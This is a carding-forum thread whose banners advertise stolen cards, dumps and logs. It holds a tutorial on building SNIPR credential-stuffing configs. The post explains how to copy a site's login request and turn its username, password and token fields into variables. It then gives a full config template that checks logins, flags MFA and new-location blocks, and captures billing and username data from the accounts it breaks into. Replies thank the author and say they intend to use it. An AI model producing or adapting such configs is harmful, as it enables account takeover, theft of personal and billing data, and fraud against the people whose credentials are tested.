Carding Forum for Carders | Кардинг форум

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

✨ CONTACT ADMIN FOR ADVERTISEMENT ✨
📩 TELEGRAM: @Smithevervell
📧 EMAIL: evervellsmith@gmail.com
Kevin Financial Service
Carding Services WU PAYPAL CASHAPP CC DUMPS LOGS | Transfer Services • Live Deals • Seller-friendly
banner expire at 13 August 2024
Wizard's shop 2.0

HOW TO MAKE SNIPR CONFIGS (THE EASY WAY)

dxnnis

Member
:fiesta: The best tutorial for make SNIPR CONFIGS easy and fast! :fiesta:
:pepi: LEAVE YOUR LIKE, DON'T BE A LEECHER  :pepi:
LEECHER = REPORT = BAN


[hide]Now lets assume after this you login into Google.com, now what your browser do is it sends  a POST request, POST Basically can transfer data from you to the website and then the website returns something like "Login Successful" or redirect you to another homepage with your name on it etc. Now this POST request are usually in form of

Code:
username=demonx&password=mystrongpass&token=123123sdasd123212n128312i




Token: Token is basically a security made by website developers to stop bots like you from  cracking accounts too easily. Not all websites have this but lets assume they do. Now, the above  POST request
Code:
"username=demonx&password=mystrongpass&token=123123sdasd123212n128312i" 


this is done by our browser automatically, now we want to send  this  exactly to google.com so it tells us if its correct or not. This is how we will do it in most cases.
Code:
username=&password=&token=+token|1+


Sometimes you wish to change the syntax of PostData meaning the Website wants Token first and after that password, how would you know this? As I said we are just going to clone the request and for that we will see what our browsers sends and clone it. Every browser have Developer tools/Inspect Element(Use Cntrl + SHIFT +  I to open it). We are going to use that to see what happens when you put user and pass.
Code:
https://prnt.sc/je6wbw STEP 1
https://prnt.sc/je6xsv STEP 2
http://prntscr.com/je6yy0 STEP 3


Now you've seen the postData send to the website, here it is how we are going to set it in Snipr.
Code:
ORIGINAL:

login_form%5Bname%5D=my_email%40gmail.com&login_form%5Bpassword%5D=mystrongpass&login_form%5Bredirect_url%5D=%2F&login_form%5B_token%5D=vlHZXQ-IO-yW1JB9mWrXuySeGmafKSAs3iGLw76J_eU


SNIPR:
login_form%5Bname%5D=&login_form%5Bpassword%5D=&login_form%5Bredirect_url%5D=%2F&login_form%5B_token%5D=+token|1+


     SNIPR CONFIG TEMPLATE
Code:
[color=#000000]{ \\ THIS IS GENERAL SECTION DEFINES NAME, PROXY ETC
    "General": {
        "name": "Config_name",
        "proxyType": "Proxies/Proxyless",
        "comboType": "Email/User",
        "credit": "Win32.exe"
    },
    "Requests": [ \\  REQUESTS SECTIONS WHERE ALL GET AND POST HAPPENS
        {
            "actionUrl": "POST METHOD USUALLY USED TO POST  USER + PASSWORD + ANY TOKEN TO WEBSITE FOR AUTHENTICATION", \\ request 1
            "method": "POST",
            "contentType": "application\/json; charset=UTF-8",  \\  THIS EXAMPLE USES A JSON SITE, REMOVE IF NOT JSON
            "postData": "{\"email\":\"[/color][color=#000088]<USER>[/color][color=#000000]\",\"password\":\"[/color][color=#000088]<PASS>[/color][color=#000000]\"}",  \\ whenever you want " as a string you put \"
            "successKeys": [
                "{\"token\":",
                ""
            ],
            "failureKeys": [
                "Password does not match",
                "This account has been disabled.",
                "\"mfa\": true",
                "New login location detected",
               
           
            ],
            "regex": [ \\this site  needs a token to put in headers
                {
                    "name": "token",
                    "pattern": "\"token\": \"([^\"]*)\"",
                    "usedFor": "headers"
                }
               
            ]
        }, \\ COMMA AFTER EVERY REQUEST HAS BEEN COMPLETED
        {
            "actionUrl": "This one is Get Method generally used to capture or get information after login or before login for token", \\request 2
            "method": "GET",
            "headers": [
                {
                    "name": "Authorization",
                    "value": "+token|1+"
                }
            ],
            "regex": [
                {
                    "name": "billing",
                    "pattern": "\"billing\": \"([^\"]*)\"",
                    "usedFor": "capture"
                }
            ],
           
            "successKeys": [
                "\"billing\":"
            ]
           
        },
        {
            "actionUrl": "SOMETIMES YOU NEED MULTIPLE REQUESTS THIS ONE IS USED TO CAPTURE USERNAME IN THE ACCOUNT",\\ request:3
            "method": "GET",
            "headers": [ \\ sometimes you need custom things in headers like a token, this is how you use it
                {
                    "name": "Authorization",
                    "value": "+token|1+" \\ whenever you wish to use a regex/variable put it as +name|1+
                }
            ],
            "regex": [  \\another variable to store username
                {
                    "name": "Cap",
                    "pattern": "\"username\": \"([^\"]*)\"",
                    "usedFor": "capture" \\ this one is used to capture
                }
            ],
           
            "successKeys": [
                "\"username\":"
            ],
            "capture": [
                "Username - +Cap|1+ | Billing - +billing|1+" \\ this  prints Username - "Our username Request 3"  |  BILLING - "Our Billing from Request 2"
               
            ]
        }
    ]
}[/color]


That's all, :fiesta:
Leave Like, Don't be a leecher  :pepi: [/hide]

 
 
 
How does this not have more replies and likes?!

Thanks so much for sharing this guide, I'll be using it for sure.

Edit: This is a pretty good tutorial. Just one question:

Does this come with capture automatically? I'm assuming not. If I'm correct, would you mind making a tutorial for capture configs? Thanks so much!
 
brandonx said:
How does this not have more replies and likes?!

Thanks so much for sharing this guide, I'll be using it for sure.

Edit: This is a pretty good tutorial. Just one question:

Does this come with capture automatically? I'm assuming not. If I'm correct, would you mind making a tutorial for capture configs? Thanks so much!

Have a little tip, to make configs with capture on that tutorial  :smart:
 
dxnnis said:
:fiesta: The best tutorial for make SNIPR CONFIGS easy and fast! :fiesta:
:pepi: LEAVE YOUR LIKE, DON'T BE A LEECHER  :pepi:
LEECHER = REPORT = BAN




 
 

Thanks! Still trying to learn this stuff.
 
dxnnis said:
:fiesta: The best tutorial for make SNIPR CONFIGS easy and fast! :fiesta:
:pepi: LEAVE YOUR LIKE, DON'T BE A LEECHER  :pepi:
LEECHER = REPORT = BAN




 
 

We're all new to this. This post made all of our lives so much easier. Thank you!
 
dxnnis said:
:fiesta: The best tutorial for make SNIPR CONFIGS easy and fast! :fiesta:
:pepi: LEAVE YOUR LIKE, DON'T BE A LEECHER  :pepi:
LEECHER = REPORT = BAN



 

ooooooooo yeah nice
im pumped none of the ones i found work
 
 
Back
Top